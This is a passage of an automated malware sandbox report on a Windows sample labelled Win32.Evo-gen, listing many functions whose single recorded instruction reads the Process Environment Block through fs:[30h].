      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84AF50 mov ecx, dword ptr fs:[00000030h]5_2_1D84AF50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84EF66 mov eax, dword ptr fs:[00000030h]5_2_1D84EF66
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BBF93 mov eax, dword ptr fs:[00000030h]5_2_1D7BBF93
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov ecx, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A0F90 mov eax, dword ptr fs:[00000030h]5_2_1D7A0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864F7C mov eax, dword ptr fs:[00000030h]5_2_1D864F7C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D791E70 mov eax, dword ptr fs:[00000030h]5_2_1D791E70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CCE70 mov eax, dword ptr fs:[00000030h]5_2_1D7CCE70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C7E71 mov eax, dword ptr fs:[00000030h]5_2_1D7C7E71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78BE60 mov eax, dword ptr fs:[00000030h]5_2_1D78BE60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78BE60 mov eax, dword ptr fs:[00000030h]5_2_1D78BE60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D850EAD mov eax, dword ptr fs:[00000030h]5_2_1D850EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D850EAD mov eax, dword ptr fs:[00000030h]5_2_1D850EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BEE48 mov eax, dword ptr fs:[00000030h]5_2_1D7BEE48
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78FE40 mov eax, dword ptr fs:[00000030h]5_2_1D78FE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78AE40 mov eax, dword ptr fs:[00000030h]5_2_1D78AE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78AE40 mov eax, dword ptr fs:[00000030h]5_2_1D78AE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78AE40 mov eax, dword ptr fs:[00000030h]5_2_1D78AE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78DE45 mov eax, dword ptr fs:[00000030h]5_2_1D78DE45
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78DE45 mov ecx, dword ptr fs:[00000030h]5_2_1D78DE45
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D817EC3 mov eax, dword ptr fs:[00000030h]5_2_1D817EC3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D817EC3 mov ecx, dword ptr fs:[00000030h]5_2_1D817EC3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CCE3F mov eax, dword ptr fs:[00000030h]5_2_1D7CCE3F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864EC1 mov eax, dword ptr fs:[00000030h]5_2_1D864EC1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D792E32 mov eax, dword ptr fs:[00000030h]5_2_1D792E32
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81CED0 mov ecx, dword ptr fs:[00000030h]5_2_1D81CED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D859ED2 mov eax, dword ptr fs:[00000030h]5_2_1D859ED2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78BE18 mov ecx, dword ptr fs:[00000030h]5_2_1D78BE18
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84EEE7 mov eax, dword ptr fs:[00000030h]5_2_1D84EEE7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C8E15 mov eax, dword ptr fs:[00000030h]5_2_1D7C8E15
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793E14 mov eax, dword ptr fs:[00000030h]5_2_1D793E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793E14 mov eax, dword ptr fs:[00000030h]5_2_1D793E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793E14 mov eax, dword ptr fs:[00000030h]5_2_1D793E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793E01 mov eax, dword ptr fs:[00000030h]5_2_1D793E01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796E00 mov eax, dword ptr fs:[00000030h]5_2_1D796E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796E00 mov eax, dword ptr fs:[00000030h]5_2_1D796E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796E00 mov eax, dword ptr fs:[00000030h]5_2_1D796E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796E00 mov eax, dword ptr fs:[00000030h]5_2_1D796E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D833EFC mov eax, dword ptr fs:[00000030h]5_2_1D833EFC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864E03 mov eax, dword ptr fs:[00000030h]5_2_1D864E03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CEF0 mov eax, dword ptr fs:[00000030h]5_2_1D78CEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CEF0 mov eax, dword ptr fs:[00000030h]5_2_1D78CEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CEF0 mov eax, dword ptr fs:[00000030h]5_2_1D78CEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CEF0 mov eax, dword ptr fs:[00000030h]5_2_1D78CEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CEF0 mov eax, dword ptr fs:[00000030h]5_2_1D78CEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78CEF0 mov eax, dword ptr fs:[00000030h]5_2_1D78CEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C1EED mov eax, dword ptr fs:[00000030h]5_2_1D7C1EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C1EED mov eax, dword ptr fs:[00000030h]5_2_1D7C1EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C1EED mov eax, dword ptr fs:[00000030h]5_2_1D7C1EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D792EE8 mov eax, dword ptr fs:[00000030h]5_2_1D792EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D792EE8 mov eax, dword ptr fs:[00000030h]5_2_1D792EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D792EE8 mov eax, dword ptr fs:[00000030h]5_2_1D792EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D792EE8 mov eax, dword ptr fs:[00000030h]5_2_1D792EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793EE2 mov eax, dword ptr fs:[00000030h]5_2_1D793EE2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FE1F mov eax, dword ptr fs:[00000030h]5_2_1D80FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FE1F mov eax, dword ptr fs:[00000030h]5_2_1D80FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FE1F mov eax, dword ptr fs:[00000030h]5_2_1D80FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FE1F mov eax, dword ptr fs:[00000030h]5_2_1D80FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D858E26 mov eax, dword ptr fs:[00000030h]5_2_1D858E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D858E26 mov eax, dword ptr fs:[00000030h]5_2_1D858E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D858E26 mov eax, dword ptr fs:[00000030h]5_2_1D858E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D858E26 mov eax, dword ptr fs:[00000030h]5_2_1D858E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D1ED8 mov eax, dword ptr fs:[00000030h]5_2_1D7D1ED8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBED0 mov eax, dword ptr fs:[00000030h]5_2_1D7CBED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D826E30 mov eax, dword ptr fs:[00000030h]5_2_1D826E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D826E30 mov eax, dword ptr fs:[00000030h]5_2_1D826E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825E30 mov eax, dword ptr fs:[00000030h]5_2_1D825E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825E30 mov ecx, dword ptr fs:[00000030h]5_2_1D825E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825E30 mov eax, dword ptr fs:[00000030h]5_2_1D825E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825E30 mov eax, dword ptr fs:[00000030h]5_2_1D825E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825E30 mov eax, dword ptr fs:[00000030h]5_2_1D825E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D825E30 mov eax, dword ptr fs:[00000030h]5_2_1D825E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2EB8 mov eax, dword ptr fs:[00000030h]5_2_1D7C2EB8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2EB8 mov eax, dword ptr fs:[00000030h]5_2_1D7C2EB8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov eax, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov eax, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov eax, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov ecx, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A1EB2 mov eax, dword ptr fs:[00000030h]5_2_1D7A1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80DE50 mov eax, dword ptr fs:[00000030h]5_2_1D80DE50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80DE50 mov eax, dword ptr fs:[00000030h]5_2_1D80DE50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80DE50 mov ecx, dword ptr fs:[00000030h]5_2_1D80DE50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80DE50 mov eax, dword ptr fs:[00000030h]5_2_1D80DE50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80DE50 mov eax, dword ptr fs:[00000030h]5_2_1D80DE50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CCEA0 mov eax, dword ptr fs:[00000030h]5_2_1D7CCEA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864E62 mov eax, dword ptr fs:[00000030h]5_2_1D864E62
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D840E6D mov eax, dword ptr fs:[00000030h]5_2_1D840E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAE89 mov eax, dword ptr fs:[00000030h]5_2_1D7BAE89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAE89 mov eax, dword ptr fs:[00000030h]5_2_1D7BAE89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BBE80 mov eax, dword ptr fs:[00000030h]5_2_1D7BBE80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84EE78 mov eax, dword ptr fs:[00000030h]5_2_1D84EE78
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D796970 mov eax, dword ptr fs:[00000030h]5_2_1D796970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A096B mov eax, dword ptr fs:[00000030h]5_2_1D7A096B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A096B mov eax, dword ptr fs:[00000030h]5_2_1D7A096B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8189A0 mov eax, dword ptr fs:[00000030h]5_2_1D8189A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CC958 mov eax, dword ptr fs:[00000030h]5_2_1D7CC958
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B950 mov eax, dword ptr fs:[00000030h]5_2_1D79B950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B950 mov ecx, dword ptr fs:[00000030h]5_2_1D79B950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B950 mov eax, dword ptr fs:[00000030h]5_2_1D79B950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B950 mov eax, dword ptr fs:[00000030h]5_2_1D79B950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B950 mov eax, dword ptr fs:[00000030h]5_2_1D79B950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79B950 mov eax, dword ptr fs:[00000030h]5_2_1D79B950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81F9AA mov eax, dword ptr fs:[00000030h]5_2_1D81F9AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81F9AA mov eax, dword ptr fs:[00000030h]5_2_1D81F9AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B4955 mov eax, dword ptr fs:[00000030h]5_2_1D7B4955
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B4955 mov eax, dword ptr fs:[00000030h]5_2_1D7B4955
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8269B0 mov eax, dword ptr fs:[00000030h]5_2_1D8269B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8269B0 mov eax, dword ptr fs:[00000030h]5_2_1D8269B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8269B0 mov ecx, dword ptr fs:[00000030h]5_2_1D8269B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BE94E mov eax, dword ptr fs:[00000030h]5_2_1D7BE94E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CC944 mov eax, dword ptr fs:[00000030h]5_2_1D7CC944
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BD940 mov eax, dword ptr fs:[00000030h]5_2_1D7BD940
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BD940 mov eax, dword ptr fs:[00000030h]5_2_1D7BD940
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84D9C6 mov eax, dword ptr fs:[00000030h]5_2_1D84D9C6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B9938 mov ecx, dword ptr fs:[00000030h]5_2_1D7B9938
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E693A mov eax, dword ptr fs:[00000030h]5_2_1D7E693A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E693A mov eax, dword ptr fs:[00000030h]5_2_1D7E693A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E693A mov eax, dword ptr fs:[00000030h]5_2_1D7E693A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D81D9C7 mov eax, dword ptr fs:[00000030h]5_2_1D81D9C7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78B931 mov eax, dword ptr fs:[00000030h]5_2_1D78B931
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78B931 mov eax, dword ptr fs:[00000030h]5_2_1D78B931
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8629CF mov eax, dword ptr fs:[00000030h]5_2_1D8629CF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D8629CF mov eax, dword ptr fs:[00000030h]5_2_1D8629CF
